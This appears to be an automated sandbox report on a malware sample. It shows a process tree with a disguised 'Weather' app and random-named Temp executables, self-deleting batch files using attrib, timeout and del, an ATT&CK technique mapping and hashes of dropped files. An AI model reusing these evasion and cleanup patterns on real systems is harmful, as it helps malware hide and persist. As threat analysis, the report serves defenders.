                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1836 /prefetch:2
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:7368
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2528 /prefetch:1
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:6972
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2200 /prefetch:2
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:2816
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --mojo-platform-channel-handle=3240 /prefetch:8
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:8100
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --mojo-platform-channel-handle=3584 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:8416
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --mojo-platform-channel-handle=3644 /prefetch:8
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:7076
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --mojo-platform-channel-handle=3456 /prefetch:8
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:3852
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1820,6999641084514030851,3685805147824938698,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7640_1867086921" --mojo-platform-channel-handle=828 /prefetch:8
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:7404
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE8FEF.bat" "
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:7908
                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                            PID:4768
                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                            C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:5476
                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE8FEF.bat"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                            PID:6040
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE8FEF.bat" "
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:7084
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:4812
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE8FAF.bat" "
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:6788
                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                  PID:3028
                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                  C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:4148
                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE8FAF.bat"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                  PID:5504
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE8FAF.bat" "
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:4816
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:928
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:6252
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:6992
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6316
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                  PID:1240
                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:7060
                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3f088fb3-0ce5-6747-8eab-ca02663ba777}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:7836
                                                                                                                                                                                                                      • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                        DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:7956
                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4496
                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:7992
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:9172
                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:8784
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:7884
                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5796
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1220
                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:8640
                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                          MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4868
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8ABE.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8ABE.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:6280
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8DAD.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8DAD.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6016
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9687.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\9687.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:2284
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AC04.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\AC04.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5936
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AC04.exe
                                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    PID:6316
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AC04.exe
                                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:8172
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B23F.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B23F.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5876
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B712.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B712.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:8380
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BBF5.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BBF5.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5824
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C2DC.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C2DC.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5328
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C2DC.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C2DC.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:8196
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:6492
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4796
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:8968
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5480
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:8324
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5868
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:7400
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:5904
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5484
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7891.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7891.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5028
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\88FD.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\88FD.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:5448
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\935E.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\935E.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:6608

                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1158

                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1158

                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                    9
                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                    9
                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1063

                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                    • C:\Program Files\unins0000.dat
                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      b1fea024dd26bb61f24d14f74e21574c

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      750ecb662506d66fc5a8477ad9f92685f8c9e7ee

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      2038c6a04451ac48ad3cf25d95bb1bfded2d7b6d0b7c012dad70a71205ea71c9

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      78633190ac428fc5b8686ef14a36214d305e57dec6281bf70a1f02d918a3db1e54b30a3941312958b4db861c2ba37c61cc8880382dab3959f728b377ca9f1a86

                                                                                                                                                                                                                                                                                    • C:\Program Files\unins0000.dll
                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      466f323c95e55fe27ab923372dffff50

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      b2dc4328c22fd348223f22db5eca386177408214

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      6bfb49245a5a92113a71f731fc22fbb8397f836a123b3267196a2a4f8dd70c5c

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      60e242f873d76f77ec7486460d1181468ed060113f6331ab0a4bb540531e0526177819b1413edb316e1d133bd467cfcaacbbe6eb6f63f5b9a9777f50de39cbb6

                                                                                                                                                                                                                                                                                    • C:\Program Files\unins0000.vbs
                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      6074e379e89c51463ee3a32ff955686a

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      0c2772c9333bb1fe35b7e30584cefabdf29f71d1

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      3d4716dfe7a52575a064590797413b4d00f2366a77af43cf83b131ab43df145e

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      0522292e85b179727b62271763eecb23a2042f46023336034ae8f477cd25a65e12519582d08999116d193e6e105753685356b0244c451139a21d4174fb4f6933

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      3fbd82cddfe91a43d84f4c2cf6dc8ab3

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      dcce22f93b8370880247be827b5e2029e0fd2ce3

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      fbbf42220c7ca232e2c259ba4a249bc88dfde1e6676baf422ba05be816a319e4

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      03a07d49ab971eb81a196242680ec2797d83fff8885d8461553c8b5a1c946f26cc27ac6da517690570255cb99d17e86959880586a625ada79da9ef689710589f

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\59D1C89B35882FB67B19C498B4BDBDE0
                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      d5e6bd2ce4e51c51a2ef5ebc90d39f6b

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      70881530e4cfdbc9752a17780262e2490a918cf5

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      7c8da4e5c3dee7ba0848025d0133b5b501e7a065f5ee6ecab4fadf5c5900ca25

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      fcea61256a3e163b595bfb5c3e3a93dbdb79f43cd32ce94700fd16f418daf9e484701aed2ac7f0e75fd3bf02b948f8035a2e3fa98040f35141b34db26be8b109

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      92aa63ba4cbfa0e1a463e9d0a9eff3fb

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      7ea720c6dd74eedd2c5b6483e046f7994eb4d38c

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      c415a33cb490dbf41e7ca02472c1cc8db6e3039dccf4300efd93379beeeb87aa

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      cddb583329493cfc71e562ba8846e7d225ef7e87a14e084f0e913aaa969baef65162761cb501b405bd5aa31fb5508894c2d9e5f3775faf4f606ebab0b6c36de0

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      d1b1f562e42dd37c408c0a3c7ccfe189

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      c01e61a5c5f44fb038228b7e542f6a8d7c8c283d

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      7f468f04fe5a1b0616685f157a4285090b6ed3858d4cd9efe915aaeed83c158e

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      404d279fabd4886008e47e9138f799cf398f0aa4c8556192d6e45dbcde99eac2cd65c47b9e0b88bd6d3a6529818f6048a23a197a913fb917b19dffbbd5d75850

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                                                                                                                                                                                      MD5

